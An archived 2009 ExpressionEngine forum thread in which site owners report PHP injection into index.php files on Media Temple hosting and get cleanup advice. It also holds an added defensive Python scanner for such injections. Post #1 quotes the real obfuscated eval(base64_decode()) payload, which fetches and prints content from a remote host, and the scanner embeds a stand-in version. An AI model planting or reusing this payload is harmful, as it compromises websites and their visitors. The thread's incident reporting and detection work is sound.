This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


EE PHP Exploit Found.

November 10, 2009 3:55pm

  • #1 / Nov 10, 2009 3:55pm

    sahadeva

    14 posts

    Just wanted to let you guys know that two of my sites were recently taken offline due to a php injection into the index.php files in EE (running 1.6.8 and 1.5.2).

    Here was the error I received when loading one of the sites:

    Parse error: syntax error, unexpected T_STRING in /nfs/c02/h06/mnt/15909/domains/sahadeva.com/html/index.php on line 60

    Here was the code being injected into the site:

    <!--5edfgh345--><?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

    I removed the code, updated the passwords for my EE install and FTP accounts. Things seem to be working again now - anything I can do besides changing my passwords?

    Mod Edit: Moved to the Technical Support Forum

  • #2 / Nov 10, 2009 4:04pm

    Ingmar

    29245 posts

    Thank you for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. We need some additional information from you.

    Is that a version of EE Core? What exact version and build are we dealing with? Do you have any other scripts on your account, whether in use or not (phpBB, etc.)?

    If this is a shared hosting environment, the host can help us find the vector of attack. These attacks quite often start with some other script, even some other account on the server and spread from there.

    To that, what is being hacked and changed? If you look through:

    - path.php
    - config.php
    - index.php

    Do you see malicious code being put in there or in other locations?

    My suggestion would be to upgrade all installs to the latest version and build, completely replacing all files with known good copies, and change all of your passwords.

    Although I have no reason to think this is an issue with EE, we would very much like to get to the bottom of it.
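    A defender-side check for the injection shape quoted in #1 and the files Ingmar lists in #2, added here as an example (it is not from the thread or from ExpressionEngine). It flags any eval(base64_decode("...")) in index.php, path.php or config.php, decodes the literal so you can see what it does, and notes whether the decoded code pulls content from a remote host. The sample file and its URL are constructed placeholders, not the real payload.

```python
import base64
import binascii
import re
from pathlib import Path

# Shape of the injected line in #1: a PHP tag feeding a base64 literal straight
# into eval(). Real ExpressionEngine files never do this, so every hit is suspect.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)",
    re.IGNORECASE,
)
# Calls such a payload uses to pull and print content from a remote host.
REMOTE_FETCH = re.compile(r"curl_exec|file_get_contents|\bfile\s*\(", re.IGNORECASE)

def decode_payload(b64: str) -> str:
    """Decode the base64 argument (whitespace inside the literal is tolerated)."""
    try:
        return base64.b64decode("".join(b64.split())).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "<undecodable base64>"

def find_injections(source: str):
    """Return [(line_no, decoded_payload, fetches_remote)] for each hit in one file's text."""
    hits = []
    for m in EVAL_B64.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        decoded = decode_payload(m.group(1))
        hits.append((line_no, decoded, bool(REMOTE_FETCH.search(decoded))))
    return hits

def scan_tree(root: str, names=("index.php", "path.php", "config.php")):
    """Walk an install and report hits in the files named in #2 (any directory depth)."""
    report = {}
    for p in Path(root).rglob("*.php"):
        if p.name in names:
            hits = find_injections(p.read_text(errors="replace"))
            if hits:
                report[str(p)] = hits
    return report

# Constructed sample, not the real payload: a stand-in index.php with the
# marker comment + eval(base64_decode()) line appended; the URL is a placeholder.
_FAKE_PAYLOAD = ('$l="http://example.invalid/link.php"; $ch=curl_init(); '
                 'curl_setopt($ch, CURLOPT_URL, $l); print @curl_exec($ch);')
SAMPLE_INDEX_PHP = (
    "<?php\n// stand-in for the real EE bootstrap code\necho 'site';\n?>\n"
    '<!--5edfgh345--><?php eval(base64_decode("'
    + base64.b64encode(_FAKE_PAYLOAD.encode()).decode() + '")); ?>\n'
)
```

    Run scan_tree("/path/to/ee") on a copy of the install and diff any flagged file against a known-good download before replacing it.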

  • #3 / Nov 23, 2009 2:47am

    leegreen

    29 posts

    Hi -
    I have had this happen to two EE sites recently, both on mediatemple servers (different account holders).
    Any thoughts on how I can stop this occurring again?

    One site is running 1.6.7 and the other is latest 1.6.8 build.

  • #4 / Nov 23, 2009 3:37am

    Ingmar

    29245 posts

    I have had this happen to two EE sites recently, both on mediatemple servers (different account holders).
    Any thoughts on how I can stop this occurring again?

    Please understand that we have no reason to assume this to be an issue with EE. What we recommend in cases like that is to notify your host and work with them to understand how this break-in occurred, change all of your passwords (EE, FTP, MySQL) and replace all of your files with known good copies downloaded from our site, upgrading to the latest version and build in the process if you haven’t done so.

    One site is running 1.6.7 and the other is latest 1.6.8 build.

    Yes, we always recommend to use the latest major version for security reasons. Even so, the recent series of events was a problem with MT (and limited to their servers).

  • #5 / Nov 25, 2009 6:48pm

    This happened today to my client’s website while I was working in the Control Panel! ... “I just popped out the back for a few minutes and when I returned someone had stolen all my stuff!”

    No website (index.php “Parse error: syntax error, unexpected T_STRING in /nfs/c04/h04/mnt/67006/domains/zok.com/html/index.php on line 61” )

    Removed code, pushed up new clean page and website back online.
    Checked for other signs of intrusion - nothing.
    Passwords being changed.

    FYI (1.6.7 build 111) They have the 1.6.8 stuff to upgrade but we resisted while we worked towards a launch three weeks ago.
    Maybe we need to move to 1.6.8 this weekend, just to be on the safe side?

    We have informed (mt) of the ‘break-in’. Still awaiting their reply.

    Another (mt) (grid server) hosted site - so there is a pattern.

    I got an email today from them, about my own account, not the client’s one.

    Priority maintenance on DVS platform

    To address a potentially critical security hole in the DVS platform, it was necessary to restart all the VSes in order to enable the software fix.

    This restart was performed as a matter of urgent priority during the early hours of Wednesday 25th November 2009.

    Let’s hope they ‘fess up - after all, we all make mistakes sometimes - it’s just embarrassing and damaging after I recommended them after giving me 5 years rock solid web support.

    Ho hum…

  • #6 / Nov 25, 2009 6:53pm

    Adam Dorsey

    1439 posts

    Hi HEX32 -
    Thanks for reporting this. If you hear anything back from Media Temple, please let us know.

    In regards to upgrading to 1.6.8: while this security issue is almost certainly a Media Temple issue, we certainly recommend upgrading to 1.6.8, as it has some important fixes and security updates.

    Thanks again for keeping us informed!
